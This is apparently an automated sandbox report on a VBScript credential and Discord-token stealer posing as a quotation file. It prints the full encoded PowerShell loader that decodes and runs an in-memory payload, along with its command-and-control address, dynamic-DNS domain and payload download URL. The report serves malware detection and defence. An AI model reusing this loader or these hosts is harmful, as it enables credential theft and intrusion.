Edit tour

Windows Analysis Report
RFQ_43200046412000086500125.vbs

Overview

General Information

Sample name:	RFQ_43200046412000086500125.vbs
Analysis ID:	1591736
MD5:	e94f2e506d40bd58b44646f3fac80747
SHA1:	cf96f6bd5e8f37b0ec204ea98029de3dd70ecfdb
SHA256:	df53a625989cecc35e201e16649966ed99d8df4e71b7b9b53c1a5767e7235332
Tags:	vbsuser-lowmal3
Infos:

Detection

Discord Token Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious encrypted Powershell command line found

Malicious sample detected (through community Yara rule)

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Discord Token Stealer

AI detected suspicious sample

Creates processes via WMI

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Powershell is started from unusual location (likely to bypass HIPS)

Reads the Security eventlog

Reads the System eventlog

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses dynamic DNS services

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Very long command line found

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 7568 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cmd.exe (PID: 7608 cmdline: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7616 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

RFQ_43200046412000086500125.vbs.exe (PID: 7728 cmdline: "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" -enc JABBAG4AbwB2AHAAdABzAHMAaQBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAFAAYgBzAHEAcAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEEAbgBvAHYAcAB0AHMAcwBpAGoAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAGIAcwBxAHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEYAeABnAGoAYQB0AGIAeQBjAGIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFEAeQB5AGkAdAB0AHcAZgBiAHYAIAApADsAJABSAGIAbQB3AGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFoAawBuAGoAbwBrAHEAZQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABGAHgAZwBqAGEAdABiAHkAYwBiACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAG8AcAB5AFQAbwAoACAAJABSAGIAbQB3AGUAIAApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAGwAbwBzAGUAKAApADsAJABGAHgAZwBqAGEAdABiAHkAYwBiAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIAAkAFIAYgBtAHcAZQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAUQB5AHkAaQB0AHQAdwBmAGIAdgApADsAIAAkAEoAegBrAGwAcgBvAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABRAHkAeQBpAHQAdAB3AGYAYgB2ACkAOwAgACQAUQBtAHIAZwBjAGQAZQBqACAAPQAgACQASgB6AGsAbAByAG8AcwAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFEAbQByAGcAYwBkAGUAagAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQAUQBtAHIAZwBjAGQAZQBqAC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

InstallUtil.exe (PID: 8184 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000008.00000002.2076310345.0000000004CB0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.2045997781.0000000009B70000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.2011025718.0000000005606000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000008.00000002.2063750110.0000000002541000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000008.00000002.2063750110.000000000282E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.2024331201.00000000067F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: RFQ_43200046412000086500125.vbs.exe PID: 7728	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: RFQ_43200046412000086500125.vbs.exe PID: 7728	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: RFQ_43200046412000086500125.vbs.exe PID: 7728	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x10fe15:$b2: ::FromBase64String( 0x5365a:$s1: -join 0x56575:$s1: -join 0x1ad712:$s1: -join 0x1bb754:$s1: -join 0x309027:$s1: -join 0x3160fc:$s1: -join 0x3194ce:$s1: -join 0x319b80:$s1: -join 0x31b671:$s1: -join 0x31d877:$s1: -join 0x31e09e:$s1: -join 0x31e90e:$s1: -join 0x31f049:$s1: -join 0x31f07b:$s1: -join 0x31f0c3:$s1: -join 0x31f0e2:$s1: -join 0x31f932:$s1: -join 0x31faae:$s1: -join 0x31fb26:$s1: -join 0x31fbb9:$s1: -join
Process Memory Space: InstallUtil.exe PID: 8184	JoeSecurity_DiscordTokenStealer	Yara detected Discord Token Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 8184	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: InstallUtil.exe PID: 8184	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 9 entries

Unpacked PEs

Source	Rule	Description	Author
8.2.InstallUtil.exe.4cb0000.3.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.RFQ_43200046412000086500125.vbs.exe.9b70000.17.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.RFQ_43200046412000086500125.vbs.exe.6c521f0.5.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.RFQ_43200046412000086500125.vbs.exe.9b70000.17.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.RFQ_43200046412000086500125.vbs.exe.6dfde30.10.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.RFQ_43200046412000086500125.vbs.exe.6dfde30.10.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.RFQ_43200046412000086500125.vbs.exe.6b01dd0.0.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
3.2.RFQ_43200046412000086500125.vbs.exe.67f9d60.6.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Click to see the 3 entries

Sigma Signatures

System Summary

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" -enc JABBAG4AbwB2AHAAdABzAHMAaQBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAFAAYgBzAHEAcAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEEAbgBvAHYAcAB0AHMAcwBpAGoAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAGIAcwBxAHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAEYAeABnAGoAYQB0AGIAeQBjAGIAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAFEAeQB5AGkAdAB0AHcAZgBiAHYAIAApADsAJABSAGIAbQB3AGUAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AOwAkAFoAawBuAGoAbwBrAHEAZQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBHAHoAaQBwAFMAdAByAGUAYQBtACAAJABGAHgAZwBqAGEAdABiAHkAYwBiACwAIAAoAFsASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAG8AcAB5AFQAbwAoACAAJABSAGIAbQB3AGUAIAApADsAJABaAGsAbgBqAG8AawBxAGUALgBDAGwAbwBzAGUAKAApADsAJABGAHgAZwBqAGEAdABiAHkAYwBiAC4AQwBsAG8AcwBlACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIAAkAFIAYgBtAHcAZQAuAFQAbwBBAHIAcgBhAHkAKAApADsAWwBBAHIAcgBhAHkAXQA6ADoAUgBlAHYAZQByAHMAZQAoACQAUQB5AHkAaQB0AHQAdwBmAGIAdgApADsAIAAkAEoAegBrAGwAcgBvAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABRAHkAeQBpAHQAdAB3AGYAYgB2ACkAOwAgACQAUQBtAHIAZwBjAGQAZQBqACAAPQAgACQASgB6AGsAbAByAG8AcwAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAFEAbQByAGcAYwBkAGUAagAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQAUQBtAHIAZwBjAGQAZQBqAC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA==, CommandLine: "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" -enc JABBAG4AbwB2AHAAdABzAHMAaQBqACAAPQAgAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkALgBNAGEAaQBuAE0AbwBkAHUAbABlAC4ARgBpAGwAZQBOAGEAbQBlAC4AUgBlAHAAbABhAGMAZQAoACcALgBlAHgAZQAnACwAJwAnACkAOwAkAFAAYgBzAHEAcAAgAD0AIABnAGUAdAAtAGMAbwBuAHQAZQBuAHQAIAAkAEEAbgBvAHYAcAB0AHMAcwBpAGoAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ATABhAHMAdAAgADEAOwAgACQAUQB5AHkAaQB0AHQAdwBmAGIAdgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABQAGIAcwBxAHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAH

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs", ProcessId: 7568, ProcessName: wscript.exe

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe, ProcessId: 7728, TargetFilename: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mm5sfz2w.xtf.ps1

Sigma detected: Suspicious Copy From or To System Directory

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" /Y, CommandLine: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" /Y, CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7568, ParentProcessName: wscript.exe, ProcessCommandLine: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe" /Y, ProcessId: 7608, ProcessName: cmd.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs", ProcessId: 7568, ProcessName: wscript.exe

Suricata Signatures

ETPRO MALWARE Win32/zgRAT CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-15T11:38:34.356744+0100	2858531	1	Malware Command and Control Activity Detected	192.168.2.4	49737	194.226.169.227	9910	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Jump to behavior

Source: unknown

HTTPS traffic detected: 51.159.14.89:443 -> 192.168.2.4:49730 version: TLS 1.2

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2046638246.0000000009DB1000.00000004.00000800.00020000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.00000000070D6000.00000004.00000800.00020000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2038788534.0000000007B90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2046638246.0000000009DB1000.00000004.00000800.00020000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.00000000070D6000.00000004.00000800.00020000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2038788534.0000000007B90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: powershell.pdbUGP source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000000.1751510108.0000000000011000.00000020.00000001.01000000.00000005.sdmp, RFQ_43200046412000086500125.vbs.exe.1.dr
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: powershell.pdb source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000000.1751510108.0000000000011000.00000020.00000001.01000000.00000005.sdmp, RFQ_43200046412000086500125.vbs.exe.1.dr
Source:	Binary string: protobuf-net.pdb source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 4x nop then jmp 074A51F0h	3_2_074A5138
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 4x nop then jmp 074A51F0h	3_2_074A5131
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 4x nop then jmp 098764DFh	3_2_09876138
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 4x nop then jmp 098764DFh	3_2_09876148
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 4x nop then jmp 098710AAh	3_2_09870E88
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 4x nop then jmp 098710AAh	3_2_09870E98
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h	3_2_09B6E680

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2858531 - Severity 1 - ETPRO MALWARE Win32/zgRAT CnC Checkin : 192.168.2.4:49737 -> 194.226.169.227:9910

Uses dynamic DNS services

Source: unknown

DNS query: name: coloscolorado.duckdns.org

Source: global traffic

TCP traffic: 192.168.2.4:49737 -> 194.226.169.227:9910

Source: Joe Sandbox View

IP Address: 51.159.14.89 51.159.14.89

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic

HTTP traffic detected: GET /post-postlogin/Agfdatq.mp4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Host: cud-senegal.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

Source: global traffic	DNS traffic detected: DNS query: cud-senegal.org
Source: global traffic	DNS traffic detected: DNS query: coloscolorado.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: 35.37.15.0.in-addr.arpa

Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.000000000630D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000053F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000052A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000053F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: wscript.exe, 00000000.00000003.1752480716.0000026411A5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1766974031.0000026411A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/Vh5j3ku
Source: wscript.exe, 00000000.00000003.1752480716.0000026411A5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1766974031.0000026411A5D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/odirm
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000052A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002541000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.000000000282E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://archive.torproject.org/tor-package-archive/torbrowser/13.0.9/tor-expert-bundle-windows-i686-
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.000000000630D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.000000000630D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.000000000630D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000053F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cud-senegal.org
Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000053F2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cud-senegal.org/post-postlogin/Agfdatq.mp4
Source: InstallUtil.exe, 00000008.00000002.2063750110.000000000282E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v9/users/
